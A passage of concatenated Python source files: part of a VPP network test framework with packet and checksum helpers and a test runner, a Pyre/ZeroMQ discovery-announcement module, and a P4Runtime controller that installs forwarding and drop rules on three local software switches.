Extend packet to given size by padding with spaces or custom padding
NOTE: Currently works only when Raw layer is present.
:param packet: packet
:param size: target size
:param padding: padding used to extend the payload
"""
packet_len = len(packet) + 4
extend = size - packet_len
if extend > 0:
num = (extend // len(padding)) + 1
packet[Raw].load += (padding * num)[:extend].encode("ascii")
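    # Usage sketch (packet object and sizes are illustrative): given a scapy
    # packet `p` that carries a Raw layer,
    #   VppTestCase.extend_packet(p, 100)        # pad payload with spaces
    #   VppTestCase.extend_packet(p, 100, 'ab')  # pad with a custom pattern
    # packet_len adds 4 to len(packet), presumably to account for the
    # Ethernet FCS appended on the wire.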
@classmethod
def reset_packet_infos(cls):
""" Reset the list of packet info objects and packet counts to zero """
cls._packet_infos = {}
cls._packet_count_for_dst_if_idx = {}
@classmethod
def create_packet_info(cls, src_if, dst_if):
"""
Create packet info object containing the source and destination indexes
and add it to the testcase's packet info list
:param VppInterface src_if: source interface
:param VppInterface dst_if: destination interface
:returns: _PacketInfo object
"""
info = _PacketInfo()
info.index = len(cls._packet_infos)
info.src = src_if.sw_if_index
info.dst = dst_if.sw_if_index
if isinstance(dst_if, VppSubInterface):
dst_idx = dst_if.parent.sw_if_index
else:
dst_idx = dst_if.sw_if_index
if dst_idx in cls._packet_count_for_dst_if_idx:
cls._packet_count_for_dst_if_idx[dst_idx] += 1
else:
cls._packet_count_for_dst_if_idx[dst_idx] = 1
cls._packet_infos[info.index] = info
return info
@staticmethod
def info_to_payload(info):
"""
Convert _PacketInfo object to packet payload
:param info: _PacketInfo object
:returns: string containing serialized data from packet info
"""
return "%d %d %d %d %d" % (info.index, info.src, info.dst,
info.ip, info.proto)
@staticmethod
def payload_to_info(payload, payload_field='load'):
"""
Convert packet payload to _PacketInfo object
:param payload: packet payload
:type payload: <class 'scapy.packet.Raw'>
:param payload_field: packet fieldname of payload "load" for
<class 'scapy.packet.Raw'>
:type payload_field: str
:returns: _PacketInfo object containing de-serialized data from payload
"""
numbers = getattr(payload, payload_field).split()
info = _PacketInfo()
info.index = int(numbers[0])
info.src = int(numbers[1])
info.dst = int(numbers[2])
info.ip = int(numbers[3])
info.proto = int(numbers[4])
return info
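    # Round-trip sketch (values are illustrative): info_to_payload() renders
    # a _PacketInfo as e.g. "3 1 2 0 17" (index, src, dst, ip, proto), and
    # payload_to_info(Raw("3 1 2 0 17")) recovers the same fields, so tests
    # can embed tracking data in generated packets and verify it on capture.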
def get_next_packet_info(self, info):
"""
Iterate over the packet info list stored in the testcase
Start iteration with first element if info is None
Continue based on index in info if info is specified
:param info: info or None
:returns: next info in list or None if no more infos
"""
if info is None:
next_index = 0
else:
next_index = info.index + 1
if next_index == len(self._packet_infos):
return None
else:
return self._packet_infos[next_index]
def get_next_packet_info_for_interface(self, src_index, info):
"""
Search the packet info list for the next packet info with same source
interface index
:param src_index: source interface index to search for
:param info: packet info - where to start the search
:returns: packet info or None
"""
while True:
info = self.get_next_packet_info(info)
if info is None:
return None
if info.src == src_index:
return info
def get_next_packet_info_for_interface2(self, src_index, dst_index, info):
"""
Search the packet info list for the next packet info with same source
and destination interface indexes
:param src_index: source interface index to search for
:param dst_index: destination interface index to search for
:param info: packet info - where to start the search
:returns: packet info or None
"""
while True:
info = self.get_next_packet_info_for_interface(src_index, info)
if info is None:
return None
if info.dst == dst_index:
return info
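    # Iteration sketch (interface objects are illustrative): walking every
    # tracked packet sent from pg0 towards pg1:
    #   info = None
    #   while True:
    #       info = self.get_next_packet_info_for_interface2(
    #           self.pg0.sw_if_index, self.pg1.sw_if_index, info)
    #       if info is None:
    #           break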
def assert_equal(self, real_value, expected_value, name_or_class=None):
if name_or_class is None:
self.assertEqual(real_value, expected_value)
return
try:
msg = "Invalid %s: %d('%s') does not match expected value %d('%s')"
msg = msg % (getdoc(name_or_class).strip(),
real_value, str(name_or_class(real_value)),
expected_value, str(name_or_class(expected_value)))
except Exception:
msg = "Invalid %s: %s does not match expected value %s" % (
name_or_class, real_value, expected_value)
self.assertEqual(real_value, expected_value, msg)
def assert_in_range(self,
real_value,
expected_min,
expected_max,
name=None):
if name is None:
msg = None
else:
msg = "Invalid %s: %s out of range <%s,%s>" % (
name, real_value, expected_min, expected_max)
self.assertTrue(expected_min <= real_value <= expected_max, msg)
def assert_packet_checksums_valid(self, packet,
ignore_zero_udp_checksums=True):
received = packet.__class__(scapy.compat.raw(packet))
udp_layers = ['UDP', 'UDPerror']
checksum_fields = ['cksum', 'chksum']
checksums = []
counter = 0
temp = received.__class__(scapy.compat.raw(received))
while True:
layer = temp.getlayer(counter)
if layer:
layer = layer.copy()
layer.remove_payload()
for cf in checksum_fields:
if hasattr(layer, cf):
if ignore_zero_udp_checksums and \
0 == getattr(layer, cf) and \
layer.name in udp_layers:
continue
delattr(temp.getlayer(counter), cf)
checksums.append((counter, cf))
else:
break
counter = counter + 1
if 0 == len(checksums):
return
temp = temp.__class__(scapy.compat.raw(temp))
for layer, cf in checksums:
calc_sum = getattr(temp[layer], cf)
self.assert_equal(
getattr(received[layer], cf), calc_sum,
"packet checksum on layer #%d: %s" % (layer, temp[layer].name))
self.logger.debug(
"Checksum field `%s` on `%s` layer has correct value `%s`" %
(cf, temp[layer].name, calc_sum))
def assert_checksum_valid(self, received_packet, layer,
field_name='chksum',
ignore_zero_checksum=False):
""" Check checksum of received packet on given layer """
received_packet_checksum = getattr(received_packet[layer], field_name)
if ignore_zero_checksum and 0 == received_packet_checksum:
return
recalculated = received_packet.__class__(
scapy.compat.raw(received_packet))
delattr(recalculated[layer], field_name)
recalculated = recalculated.__class__(scapy.compat.raw(recalculated))
self.assert_equal(received_packet_checksum,
getattr(recalculated[layer], field_name),
"packet checksum on layer: %s" % layer)
def assert_ip_checksum_valid(self, received_packet,
ignore_zero_checksum=False):
self.assert_checksum_valid(received_packet, 'IP',
ignore_zero_checksum=ignore_zero_checksum)
def assert_tcp_checksum_valid(self, received_packet,
ignore_zero_checksum=False):
self.assert_checksum_valid(received_packet, 'TCP',
ignore_zero_checksum=ignore_zero_checksum)
def assert_udp_checksum_valid(self, received_packet,
ignore_zero_checksum=True):
self.assert_checksum_valid(received_packet, 'UDP',
ignore_zero_checksum=ignore_zero_checksum)
def assert_embedded_icmp_checksum_valid(self, received_packet):
if received_packet.haslayer(IPerror):
self.assert_checksum_valid(received_packet, 'IPerror')
if received_packet.haslayer(TCPerror):
self.assert_checksum_valid(received_packet, 'TCPerror')
if received_packet.haslayer(UDPerror):
self.assert_checksum_valid(received_packet, 'UDPerror',
ignore_zero_checksum=True)
if received_packet.haslayer(ICMPerror):
self.assert_checksum_valid(received_packet, 'ICMPerror')
def assert_icmp_checksum_valid(self, received_packet):
self.assert_checksum_valid(received_packet, 'ICMP')
self.assert_embedded_icmp_checksum_valid(received_packet)
def assert_icmpv6_checksum_valid(self, pkt):
if pkt.haslayer(ICMPv6DestUnreach):
self.assert_checksum_valid(pkt, 'ICMPv6DestUnreach', 'cksum')
self.assert_embedded_icmp_checksum_valid(pkt)
if pkt.haslayer(ICMPv6EchoRequest):
self.assert_checksum_valid(pkt, 'ICMPv6EchoRequest', 'cksum')
if pkt.haslayer(ICMPv6EchoReply):
self.assert_checksum_valid(pkt, 'ICMPv6EchoReply', 'cksum')
def get_packet_counter(self, counter):
if counter.startswith("/"):
counter_value = self.statistics.get_counter(counter)
else:
counters = self.vapi.cli("sh errors").split('\n')
counter_value = 0
for i in range(1, len(counters) - 1):
results = counters[i].split()
if results[1] == counter:
counter_value = int(results[0])
break
return counter_value
def assert_packet_counter_equal(self, counter, expected_value):
counter_value = self.get_packet_counter(counter)
self.assert_equal(counter_value, expected_value,
"packet counter `%s'" % counter)
def assert_error_counter_equal(self, counter, expected_value):
counter_value = self.statistics.get_err_counter(counter)
self.assert_equal(counter_value, expected_value,
"error counter `%s'" % counter)
@classmethod
def sleep(cls, timeout, remark=None):
# /* Allow sleep(0) to maintain win32 semantics, and as decreed
# * by Guido, only the main thread can be interrupted.
# */
# https://github.com/python/cpython/blob/6673decfa0fb078f60587f5cb5e98460eea137c2/Modules/timemodule.c#L1892 # noqa
if timeout == 0:
# yield quantum
if hasattr(os, 'sched_yield'):
os.sched_yield()
else:
time.sleep(0)
return
cls.logger.debug("Starting sleep for %es (%s)", timeout, remark)
before = time.time()
time.sleep(timeout)
after = time.time()
if after - before > 2 * timeout:
cls.logger.error("unexpected self.sleep() result - "
"slept for %es instead of ~%es!",
after - before, timeout)
cls.logger.debug(
"Finished sleep (%s) - slept %es (wanted %es)",
remark, after - before, timeout)
def pg_send(self, intf, pkts, worker=None):
self.vapi.cli("clear trace")
intf.add_stream(pkts, worker=worker)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
def send_and_assert_no_replies(self, intf, pkts, remark="", timeout=None):
self.pg_send(intf, pkts)
if not timeout:
timeout = 1
for i in self.pg_interfaces:
i.get_capture(0, timeout=timeout)
i.assert_nothing_captured(remark=remark)
timeout = 0.1
def send_and_expect(self, intf, pkts, output, n_rx=None, worker=None):
if not n_rx:
n_rx = len(pkts)
self.pg_send(intf, pkts, worker=worker)
rx = output.get_capture(n_rx)
return rx
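    # Typical usage in a test method (stream helper and interface names are
    # illustrative):
    #   pkts = self.create_stream(self.pg0, self.pg1)
    #   rx = self.send_and_expect(self.pg0, pkts, self.pg1)
    # This clears the trace, injects pkts on pg0, runs the packet generator
    # and asserts that len(pkts) packets are captured on pg1.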
def send_and_expect_only(self, intf, pkts, output, timeout=None):
self.pg_send(intf, pkts)
rx = output.get_capture(len(pkts))
outputs = [output]
if not timeout:
timeout = 1
for i in self.pg_interfaces:
if i not in outputs:
i.get_capture(0, timeout=timeout)
i.assert_nothing_captured()
timeout = 0.1
return rx
def get_testcase_doc_name(test):
return getdoc(test.__class__).splitlines()[0]
def get_test_description(descriptions, test):
short_description = test.shortDescription()
if descriptions and short_description:
return short_description
else:
return str(test)
class TestCaseInfo(object):
def __init__(self, logger, tempdir, vpp_pid, vpp_bin_path):
self.logger = logger
self.tempdir = tempdir
self.vpp_pid = vpp_pid
self.vpp_bin_path = vpp_bin_path
self.core_crash_test = None
class VppTestResult(unittest.TestResult):
"""
@property result_string
String variable to store the test case result string.
@property errors
List variable containing 2-tuples of TestCase instances and strings
holding formatted tracebacks. Each tuple represents a test which
raised an unexpected exception.
@property failures
List variable containing 2-tuples of TestCase instances and strings
holding formatted tracebacks. Each tuple represents a test where
a failure was explicitly signalled using the TestCase.assert*()
methods.
"""
failed_test_cases_info = set()
core_crash_test_cases_info = set()
current_test_case_info = None
def __init__(self, stream=None, descriptions=None, verbosity=None,
runner=None):
"""
        :param stream: File-like object to which test results are reported.
            Defaults to the standard error stream.
        :param descriptions: Whether to include test case descriptions in the
            output.
        :param verbosity: Required verbosity level.
"""
super(VppTestResult, self).__init__(stream, descriptions, verbosity)
self.stream = stream
self.descriptions = descriptions
self.verbosity = verbosity
self.result_string = None
self.runner = runner
def addSuccess(self, test):
"""
Record a test succeeded result
:param test:
"""
if self.current_test_case_info:
self.current_test_case_info.logger.debug(
"--- addSuccess() %s.%s(%s) called" % (test.__class__.__name__,
test._testMethodName,
test._testMethodDoc))
unittest.TestResult.addSuccess(self, test)
self.result_string = colorize("OK", GREEN)
self.send_result_through_pipe(test, PASS)
def addSkip(self, test, reason):
"""
Record a test skipped.
:param test:
:param reason:
"""
if self.current_test_case_info:
self.current_test_case_info.logger.debug(
"--- addSkip() %s.%s(%s) called, reason is %s" %
(test.__class__.__name__, test._testMethodName,
test._testMethodDoc, reason))
unittest.TestResult.addSkip(self, test, reason)
self.result_string = colorize("SKIP", YELLOW)
self.send_result_through_pipe(test, SKIP)
def symlink_failed(self):
if self.current_test_case_info:
try:
failed_dir = os.getenv('FAILED_DIR')
link_path = os.path.join(
failed_dir,
'%s-FAILED' %
os.path.basename(self.current_test_case_info.tempdir))
self.current_test_case_info.logger.debug(
"creating a link to the failed test")
self.current_test_case_info.logger.debug(
"os.symlink(%s, %s)" %
(self.current_test_case_info.tempdir, link_path))
if os.path.exists(link_path):
self.current_test_case_info.logger.debug(
'symlink already exists')
else:
os.symlink(self.current_test_case_info.tempdir, link_path)
except Exception as e:
self.current_test_case_info.logger.error(e)
def send_result_through_pipe(self, test, result):
if hasattr(self, 'test_framework_result_pipe'):
pipe = self.test_framework_result_pipe
if pipe:
pipe.send((test.id(), result))
def log_error(self, test, err, fn_name):
if self.current_test_case_info:
if isinstance(test, unittest.suite._ErrorHolder):
test_name = test.description
else:
test_name = '%s.%s(%s)' % (test.__class__.__name__,
test._testMethodName,
test._testMethodDoc)
self.current_test_case_info.logger.debug(
"--- %s() %s called, err is %s" %
(fn_name, test_name, err))
self.current_test_case_info.logger.debug(
"formatted exception is:\n%s" %
"".join(format_exception(*err)))
def add_error(self, test, err, unittest_fn, error_type):
if error_type == FAIL:
self.log_error(test, err, 'addFailure')
error_type_str = colorize("FAIL", RED)
elif error_type == ERROR:
self.log_error(test, err, 'addError')
error_type_str = colorize("ERROR", RED)
else:
raise Exception('Error type %s cannot be used to record an '
'error or a failure' % error_type)
unittest_fn(self, test, err)
if self.current_test_case_info:
self.result_string = "%s [ temp dir used by test case: %s ]" % \
(error_type_str,
self.current_test_case_info.tempdir)
self.symlink_failed()
self.failed_test_cases_info.add(self.current_test_case_info)
if is_core_present(self.current_test_case_info.tempdir):
if not self.current_test_case_info.core_crash_test:
if isinstance(test, unittest.suite._ErrorHolder):
test_name = str(test)
else:
test_name = "'{!s}' ({!s})".format(
get_testcase_doc_name(test), test.id())
self.current_test_case_info.core_crash_test = test_name
self.core_crash_test_cases_info.add(
self.current_test_case_info)
else:
self.result_string = '%s [no temp dir]' % error_type_str
self.send_result_through_pipe(test, error_type)
def addFailure(self, test, err):
"""
Record a test failed result
:param test:
:param err: error message
"""
self.add_error(test, err, unittest.TestResult.addFailure, FAIL)
def addError(self, test, err):
"""
Record a test error result
:param test:
:param err: error message
"""
self.add_error(test, err, unittest.TestResult.addError, ERROR)
def getDescription(self, test):
"""
Get test description
:param test:
:returns: test description
"""
return get_test_description(self.descriptions, test)
def startTest(self, test):
"""
Start a test
:param test:
"""
def print_header(test):
test_doc = getdoc(test)
if not test_doc:
raise Exception("No doc string for test '%s'" % test.id())
test_title = test_doc.splitlines()[0]
test_title_colored = colorize(test_title, GREEN)
if test.force_solo():
# long live PEP-8 and 80 char width limitation...
c = YELLOW
test_title_colored = colorize("SOLO RUN: " + test_title, c)
if not hasattr(test.__class__, '_header_printed'):
print(double_line_delim)
print(test_title_colored)
print(double_line_delim)
test.__class__._header_printed = True
print_header(test)
self.start_test = time.time()
unittest.TestResult.startTest(self, test)
if self.verbosity > 0:
self.stream.writeln(
"Starting " + self.getDescription(test) + " ...")
self.stream.writeln(single_line_delim)
def stopTest(self, test):
"""
Called when the given test has been run
:param test:
"""
unittest.TestResult.stopTest(self, test)
if self.verbosity > 0:
self.stream.writeln(single_line_delim)
self.stream.writeln("%-73s%s" % (self.getDescription(test),
self.result_string))
self.stream.writeln(single_line_delim)
else:
self.stream.writeln("%-68s %4.2f %s" %
(self.getDescription(test),
time.time() - self.start_test,
self.result_string))
self.send_result_through_pipe(test, TEST_RUN)
def printErrors(self):
"""
Print errors from running the test case
"""
if len(self.errors) > 0 or len(self.failures) > 0:
self.stream.writeln()
self.printErrorList('ERROR', self.errors)
self.printErrorList('FAIL', self.failures)
# ^^ that is the last output from unittest before summary
if not self.runner.print_summary:
devnull = unittest.runner._WritelnDecorator(open(os.devnull, 'w'))
self.stream = devnull
self.runner.stream = devnull
def printErrorList(self, flavour, errors):
"""
Print error list to the output stream together with error type
and test case description.
:param flavour: error type
:param errors: iterable errors
"""
for test, err in errors:
self.stream.writeln(double_line_delim)
self.stream.writeln("%s: %s" %
(flavour, self.getDescription(test)))
self.stream.writeln(single_line_delim)
self.stream.writeln("%s" % err)
class VppTestRunner(unittest.TextTestRunner):
"""
    A basic test runner implementation which prints results to standard
    output.
"""
@property
def resultclass(self):
"""Class maintaining the results of the tests"""
return VppTestResult
def __init__(self, keep_alive_pipe=None, descriptions=True, verbosity=1,
result_pipe=None, failfast=False, buffer=False,
resultclass=None, print_summary=True, **kwargs):
# ignore stream setting here, use hard-coded stdout to be in sync
# with prints from VppTestCase methods ...
super(VppTestRunner, self).__init__(sys.stdout, descriptions,
verbosity, failfast, buffer,
resultclass, **kwargs)
KeepAliveReporter.pipe = keep_alive_pipe
self.orig_stream = self.stream
self.resultclass.test_framework_result_pipe = result_pipe
self.print_summary = print_summary
def _makeResult(self):
return self.resultclass(self.stream,
self.descriptions,
self.verbosity,
self)
def run(self, test):
"""
Run the tests
:param test:
"""
faulthandler.enable() # emit stack trace to stderr if killed by signal
result = super(VppTestRunner, self).run(test)
if not self.print_summary:
self.stream = self.orig_stream
result.stream = self.orig_stream
return result
class Worker(Thread):
def __init__(self, executable_args, logger, env=None, *args, **kwargs):
super(Worker, self).__init__(*args, **kwargs)
self.logger = logger
self.args = executable_args
if hasattr(self, 'testcase') and self.testcase.debug_all:
if self.testcase.debug_gdbserver:
                self.args = ['/usr/bin/gdbserver', 'localhost:{port}'.format(
                    port=self.testcase.gdbserver_port)] + self.args
elif self.testcase.debug_gdb and hasattr(self, 'wait_for_gdb'):
self.args.append(self.wait_for_gdb)
self.app_bin = executable_args[0]
self.app_name = os.path.basename(self.app_bin)
if hasattr(self, 'role'):
self.app_name += ' {role}'.format(role=self.role)
self.process = None
self.result = None
env = {} if env is None else env
self.env = copy.deepcopy(env)
def wait_for_enter(self):
if not hasattr(self, 'testcase'):
return
if self.testcase.debug_all and self.testcase.debug_gdbserver:
print()
print(double_line_delim)
print("Spawned GDB Server for '{app}' with PID: {pid}"
.format(app=self.app_name, pid=self.process.pid))
elif self.testcase.debug_all and self.testcase.debug_gdb:
print()
print(double_line_delim)
print("Spawned '{app}' with PID: {pid}"
.format(app=self.app_name, pid=self.process.pid))
else:
return
print(single_line_delim)
print("You can debug '{app}' using:".format(app=self.app_name))
if self.testcase.debug_gdbserver:
print("sudo gdb " + self.app_bin +
" -ex 'target remote localhost:{port}'"
.format(port=self.testcase.gdbserver_port))
print("Now is the time to attach gdb by running the above "
"command, set up breakpoints etc., then resume from "
"within gdb by issuing the 'continue' command")
self.testcase.gdbserver_port += 1
elif self.testcase.debug_gdb:
print("sudo gdb " + self.app_bin +
" -ex 'attach {pid}'".format(pid=self.process.pid))
print("Now is the time to attach gdb by running the above "
"command and set up breakpoints etc., then resume from"
" within gdb by issuing the 'continue' command")
print(single_line_delim)
input("Press ENTER to continue running the testcase...")
def run(self):
executable = self.args[0]
if not os.path.exists(executable) or not os.access(
executable, os.F_OK | os.X_OK):
# Exit code that means some system file did not exist,
# could not be opened, or had some other kind of error.
self.result = os.EX_OSFILE
raise EnvironmentError(
"executable '%s' is not found or executable." % executable)
self.logger.debug("Running executable: '{app}'"
.format(app=' '.join(self.args)))
env = os.environ.copy()
env.update(self.env)
env["CK_LOG_FILE_NAME"] = "-"
self.process = subprocess.Popen(
self.args, shell=False, env=env, preexec_fn=os.setpgrp,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.wait_for_enter()
out, err = self.process.communicate()
self.logger.debug("Finished running `{app}'".format(app=self.app_name))
self.logger.info("Return code is `%s'" % self.process.returncode)
self.logger.info(single_line_delim)
self.logger.info("Executable `{app}' wrote to stdout:"
.format(app=self.app_name))
self.logger.info(single_line_delim)
self.logger.info(out.decode('utf-8'))
self.logger.info(single_line_delim)
self.logger.info("Executable `{app}' wrote to stderr:"
.format(app=self.app_name))
self.logger.info(single_line_delim)
self.logger.info(err.decode('utf-8'))
self.logger.info(single_line_delim)
self.result = self.process.returncode
if __name__ == '__main__':
pass
|
pyre_discovery_master_module.py
|
from pyre import Pyre
from pyre import zhelper
import threading
import zmq
import logging
import json
import time
from uniflex.core import modules
__author__ = "Piotr Gawlowicz"
__copyright__ = "Copyright (c) 2015, Technische Universitat Berlin"
__version__ = "0.1.0"
__email__ = "{gawlowicz}@tkn.tu-berlin.de"
class PyreDiscoveryMasterModule(modules.ControlApplication):
def __init__(self, iface, groupName="uniflex", downlink=None, sub=None,
uplink=None, pub=None):
super(PyreDiscoveryMasterModule, self).__init__()
self.log = logging.getLogger('pyre_discovery_module.main')
pyreLogger = logging.getLogger('pyre')
pyreLogger.setLevel(logging.CRITICAL)
self.running = False
self.iface = iface
self.sub = downlink
if not self.sub:
self.sub = sub
self.pub = uplink
if not self.pub:
self.pub = pub
self.groupName = groupName
self.ctx = zmq.Context()
def _sending_announcements(self):
while self.running:
self.log.debug("Discovery Announcements:"
" SUB={}, PUB={}"
.format(self.sub, self.pub))
msg = json.dumps({'downlink': self.sub,
'uplink': self.pub})
self.discovery_pipe.send(msg.encode('utf_8'))
time.sleep(2)
@modules.on_start()
def start_discovery_announcements(self):
self.log.debug("Start discovery announcements".format())
self.running = True
self.discovery_pipe = zhelper.zthread_fork(
self.ctx, self.discovery_task)
d = threading.Thread(target=self._sending_announcements)
d.setDaemon(True)
d.start()
return True
@modules.on_exit()
def stop_discovery_announcements(self):
self.log.debug("Stop discovery announcements".format())
if self.running:
self.running = False
self.discovery_pipe.send("$$STOP".encode('utf_8'))
def discovery_task(self, ctx, pipe):
self.log.debug("Pyre on iface : {}".format(self.iface))
n = Pyre(self.groupName, sel_iface=self.iface)
n.set_header("DISCOVERY_Header1", "DISCOVERY_HEADER")
n.join(self.groupName)
n.start()
poller = zmq.Poller()
poller.register(pipe, zmq.POLLIN)
        while True:
items = dict(poller.poll())
if pipe in items and items[pipe] == zmq.POLLIN:
message = pipe.recv()
# message to quit
if message.decode('utf-8') == "$$STOP":
break
n.shout(self.groupName, message)
n.stop()
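# Instantiation sketch (endpoint values are hypothetical): the module joins
# the configured Pyre group on `iface` and shouts a JSON blob carrying the
# downlink (SUB) and uplink (PUB) endpoints every two seconds, e.g.
#   PyreDiscoveryMasterModule(iface='eth0', groupName='uniflex',
#                             downlink='tcp://*:8989', uplink='tcp://*:8990')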
|
controller.py
|
#!/usr/bin/env python2
import argparse
import grpc
import time
import os
import sys
import json
import pickle
from time import sleep
from collections import defaultdict
import threading
# Import P4Runtime lib from parent utils dir
# Probably there's a better way of doing this.
sys.path.append(
os.path.join(os.path.dirname(os.path.abspath(__file__)),
'../../utils/'))
import p4runtime_lib.bmv2
from p4runtime_lib.error_utils import printGrpcError
from p4runtime_lib.switch import ShutdownAllSwitchConnections
import p4runtime_lib.helper
def prettify_ip(s):
return ':'.join([str(ord(b)) for b in s])
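# Example (hypothetical input): prettify_ip('\x0a\x00\x01\x01') returns
# '10:0:1:1', i.e. the raw bitstring bytes rendered as colon-separated
# decimal values for the digest printouts below.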
def readTableRules(p4info_helper, sw):
"""
Reads the table entries from all tables on the switch.
:param p4info_helper: the P4Info helper
:param sw: the switch connection
"""
print '\n----- Reading tables rules for %s -----' % sw.name
for response in sw.ReadTableEntries():
for entity in response.entities:
entry = entity.table_entry
table_name = p4info_helper.get_tables_name(entry.table_id)
print '%s: ' % table_name,
for m in entry.match:
print p4info_helper.get_match_field_name(
table_name, m.field_id),
print '%r' % (p4info_helper.get_match_field_value(m),),
action = entry.action.action
action_name = p4info_helper.get_actions_name(action.action_id)
print '->', action_name,
for p in action.params:
print p4info_helper.get_action_param_name(
action_name, p.param_id),
print '%r' % p.value,
print
def writeDropEntry(p4info_helper, sw, table_name):
drop_entry = p4info_helper.buildTableEntry(
table_name= "MyIngress." + table_name,
default_action = True,
action_name = "MyIngress.drop",
action_params = {}
)
sw.WriteTableEntry(drop_entry)
return drop_entry
def writeTableEntry(p4info_helper, sw, table_name, dst_eth_addr, dst_eth_port, dst_ip_addr):
table_entry = p4info_helper.buildTableEntry(
table_name = "MyIngress." + table_name,
match_fields = {
"hdr.ipv4.dstAddr": [dst_ip_addr, 32]
},
action_name = "MyIngress.ipv4_forward",
action_params = {
"dstAddr": dst_eth_addr,
"port": dst_eth_port
}
)
sw.WriteTableEntry(table_entry)
return table_entry
def printDigests(p4info_helper, sw, idx, lock, ready):
lock.acquire()
print "Start checking digests for %s" % sw.device_id
ready[idx] = True
lock.release()
# TODO this is hardcoded
DIGEST_ID = 385924487
digest_entry = p4info_helper.BuildDigestEntry(digest_id=DIGEST_ID)
sw.SendDigestEntry(digest_entry)
while True:
print
for msgs in sw.StreamDigestMessages(digest_id=DIGEST_ID):
for members in msgs.data:
if members.WhichOneof('data') == 'struct':
srcAddr, dstAddr = None, None
if members.struct.members[0].WhichOneof('data') == 'bitstring':
srcAddr = prettify_ip(members.struct.members[0].bitstring)
if members.struct.members[1].WhichOneof('data') == 'bitstring':
dstAddr = prettify_ip(members.struct.members[1].bitstring)
if srcAddr and dstAddr:
print "Packet dropped from %s to %s" % (srcAddr, dstAddr)
time.sleep(100)
print "Finished checking digests for %s" % sw.device_id
def main(p4info_file_path, bmv2_file_path):
# Instantiate a P4Runtime helper from the p4info file
p4info_helper = p4runtime_lib.helper.P4InfoHelper(p4info_file_path)
try:
# Create a switch connection object for s1 and s2;
# this is backed by a P4Runtime gRPC connection.
# Also, dump all P4Runtime messages sent to switch to given txt files.
s1 = p4runtime_lib.bmv2.Bmv2SwitchConnection(
name='s1',
address='127.0.0.1:50051',
device_id=0,
proto_dump_file='logs/s1-p4runtime-requests.txt')
s2 = p4runtime_lib.bmv2.Bmv2SwitchConnection(
name='s2',
address='127.0.0.1:50052',
device_id=1,
proto_dump_file='logs/s2-p4runtime-requests.txt')
s3 = p4runtime_lib.bmv2.Bmv2SwitchConnection(
name='s3',
address='127.0.0.1:50053',
device_id=2,
proto_dump_file='logs/s3-p4runtime-requests.txt'
)
switches = {
0: s1,
1: s2,
2: s3
}
# Send master arbitration update message to establish this controller as
# master (required by P4Runtime before performing any other write operation)
s1.MasterArbitrationUpdate()
s2.MasterArbitrationUpdate()
s3.MasterArbitrationUpdate()
# Install the P4 program on the switches
s1.SetForwardingPipelineConfig(p4info=p4info_helper.p4info,
bmv2_json_file_path=bmv2_file_path)
print "Installed P4 Program using SetForwardingPipelineConfig on s1"
s2.SetForwardingPipelineConfig(p4info=p4info_helper.p4info,
bmv2_json_file_path=bmv2_file_path)
print "Installed P4 Program using SetForwardingPipelineConfig on s2"
s3.SetForwardingPipelineConfig(p4info=p4info_helper.p4info,
bmv2_json_file_path=bmv2_file_path)
print "Installed P4 Program using SetForwardingPipelineConfig on s3"
# deal with table entries
TABLE_NAME = "ipv4_lpm"
# from_sw:{ to_sw: [rules] }
accept_rules = defaultdict(dict)
# start print digest in separate threads
ready = [ False for _ in switches.items() ]
lock = threading.Lock()
for idx, (_, sw) in enumerate(switches.items()):
t = threading.Thread(target=printDigests, args=(p4info_helper, sw, idx, lock, ready))
t.start()
while True:
lock.acquire()
result = True
for state in ready:
result = result and state
if result:
lock.release()
break
else:
lock.release()
while True:
rule = raw_input("# Please enter a command: ")
rules = rule.split(" ")
rule = rules[0]
if rule == 'drop':
if len(rules) > 1:
from_sw_id, to_sw_id = int(rules[1]), int(rules[2])
if to_sw_id not in accept_rules[from_sw_id]:
print "There's no allowed traffic from switch %s to %s" % (from_sw_id, to_sw_id)
else:
switches[from_sw_id].DeleteTableEntry(accept_rules[from_sw_id][to_sw_id])
accept_rules[from_sw_id].pop(to_sw_id, None)
print "Connection from %s to %s dropped" % (from_sw_id, to_sw_id)
else:
# write all drop table rules
writeDropEntry(p4info_helper, s1, TABLE_NAME)
writeDropEntry(p4info_helper, s2, TABLE_NAME)
writeDropEntry(p4info_helper, s3, TABLE_NAME)
print "Installed drop rules on s1, s2, s3"
elif rule == 'accept':
if s1.device_id not in accept_rules[s1.device_id]:
r = writeTableEntry(p4info_helper, s1, TABLE_NAME,
"00:00:00:00:01:01", 1, "10.0.1.1")
accept_rules[s1.device_id][s1.device_id] = r
else:
print "Already allow traffic from switch %s to %s" % (s1.device_id, s1.device_id)
if s2.device_id not in accept_rules[s1.device_id]:
r = writeTableEntry(p4info_helper, s1, TABLE_NAME,
"00:00:00:02:02:00", 2, "10.0.2.2")
accept_rules[s1.device_id][s2.device_id] = r
else:
print "Already allow traffic from switch %s to %s" % (
s1.device_id, s2.device_id)
if s3.device_id not in accept_rules[s1.device_id]:
r = writeTableEntry(p4info_helper, s1, TABLE_NAME,
"00:00:00:03:03:00", 3, "10.0.3.3")
accept_rules[s1.device_id][s3.device_id] = r
else:
print "Already allow traffic from switch %s to %s" % (
s1.device_id, s3.device_id)
print "Installed transit rules for s1"
if s1.device_id not in accept_rules[s2.device_id]:
r = writeTableEntry(p4info_helper, s2, TABLE_NAME,
"00:00:00:01:01:00", 2, "10.0.1.1")
accept_rules[s2.device_id][s1.device_id] = r
else:
print "Already allow traffic from switch %s to %s" % (
s2.device_id, s1.device_id)
if s2.device_id not in accept_rules[s2.device_id]:
r = writeTableEntry(p4info_helper, s2, TABLE_NAME,
"00:00:00:00:02:02", 1, "10.0.2.2")
accept_rules[s2.device_id][s2.device_id] = r
else:
print "Already allow traffic from switch %s to %s" % (
s2.device_id, s2.device_id)
if s3.device_id not in accept_rules[s2.device_id]:
r = writeTableEntry(p4info_helper, s2, TABLE_NAME,
"00:00:00:03:03:00", 3, "10.0.3.3")
accept_rules[s2.device_id][s3.device_id] = r
else:
print "Already allow traffic from switch %s to %s" % (
s2.device_id, s3.device_id)
print "Installed transit rules for s2"
if s1.device_id not in accept_rules[s3.device_id]:
r = writeTableEntry(p4info_helper, s3, TABLE_NAME,
"00:00:00:01:01:00", 2, "10.0.1.1")
accept_rules[s3.device_id][s1.device_id] = r
else:
print "Already allow traffic from switch %s to %s" % (
s3.device_id, s1.device_id)
if s2.device_id not in accept_rules[s3.device_id]:
r = writeTableEntry(p4info_helper, s3, TABLE_NAME,
"00:00:00:02:02:00", 3, "10.0.2.2")
accept_rules[s3.device_id][s2.device_id] = r
else:
